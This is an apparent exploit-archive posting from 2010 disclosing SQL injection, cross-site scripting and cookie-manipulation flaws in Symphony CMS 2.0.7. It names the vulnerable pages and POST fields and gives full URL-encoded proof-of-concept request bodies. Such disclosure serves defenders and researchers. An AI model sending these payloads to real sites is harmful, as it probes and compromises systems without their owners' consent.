Symphony 2.0.7 SQL Injection / Cross Site Scripting

Symphony 2.0.7 SQL Injection / Cross Site Scripting: Posted Sep 11, 2010; Authored by JosS; Symphony version 2.0.7 suffers from remote SQL injection and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 9e0f7a4ba8f09c788eb72a6fb9e7a23197821bea038771805deb72f75770325d; Download | Favorite | View

Symphony 2.0.7 SQL Injection / Cross Site Scripting

Symphony 2.0.7 Multiple Vulnerabilities
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
  
contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/
  
- download: http://downloads.symphony-cms.com/symphony-package/36030/symphony-2.0.7.zip
  
- CMS:
  
 XSLT-powered open source content management system.
 
~ [SQL]
 
 This vulnerability affects /symphony-2.0.7/about/.
 
 The POST variable send-email[recipient] is vulnerable.
    send-email[recipient]='
 
fields%5Bname%5D=111-222-1933email@address.tst&fields%5Bemail%5D=111-222-1933email@address.tst&fields%5Bsubject%5D=General%20Enquiry&fields%5Bmessage%5D=111-222-1933email@address.tst&send-email%5Brecipient%5D='&send-email%5Bsender-email%5D=fields%5Bemail%5D&send-email%5Bsender-name%5D=fields%5Bname%5D&send-email%5Bsubject%5D=fields%5Bsubject%5D&send-email%5Bbody%5D=fields%5Bmessage%5D%2Cfields%5Bsubject%5D%2Cfields%5Bemail%5D%2Cfields%5Bname%5D&action%5Bsave-message%5D=Send
 
~ [XSS]
 
 This vulnerability affects /symphony-2.0.7/articles/a-primer-to-symphony-2s-default-theme/.
 
 The POST variable fields[website] is vulnerable.
    fields[Bwebsite]=javascript:alert('JosS')
 
fields%5Bauthor%5D=111-222-1933email@address.tst&fields%5Bemail%5D=111-222-1933email@address.tst&fields%5Bwebsite%5D=javascript:alert(418231608845)&fields%5Bcomment%5D=111-222-1933email@address.tst&fields%5Barticle%5D=3&action%5Bsave-comment%5D=Post%20Comment
 
~ [Cookie Manipulation]
 
 This vulnerability affects /symphony-2.0.7/about/.
 
 The POST variable send-email[recipient] is vulnerable.
    send-email%5Brecipient%5D=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
 
fields%5Bname%5D=111-222-1933email@address.tst&fields%5Bemail%5D=111-222-1933email@address.tst&fields%5Bsubject%5D=General%20Enquiry&fields%5Bmessage%5D=111-222-1933email@address.tst&send-email%5Brecipient%5D=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&send-email%5Bsender-email%5D=fields%5Bemail%5D&send-email%5Bsender-name%5D=fields%5Bname%5D&send-email%5Bsubject%5D=fields%5Bsubject%5D&send-email%5Bbody%5D=fields%5Bmessage%5D%2Cfields%5Bsubject%5D%2Cfields%5Bemail%5D%2Cfields%5Bname%5D&action%5Bsave-message%5D=Send
 
 
------------
Hack0wn Team
By: JosS
------------
 
__h0__

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Symphony 2.0.7 SQL Injection / Cross Site Scripting

Symphony 2.0.7 SQL Injection / Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Symphony 2.0.7 SQL Injection / Cross Site Scripting

Share This

Symphony 2.0.7 SQL Injection / Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems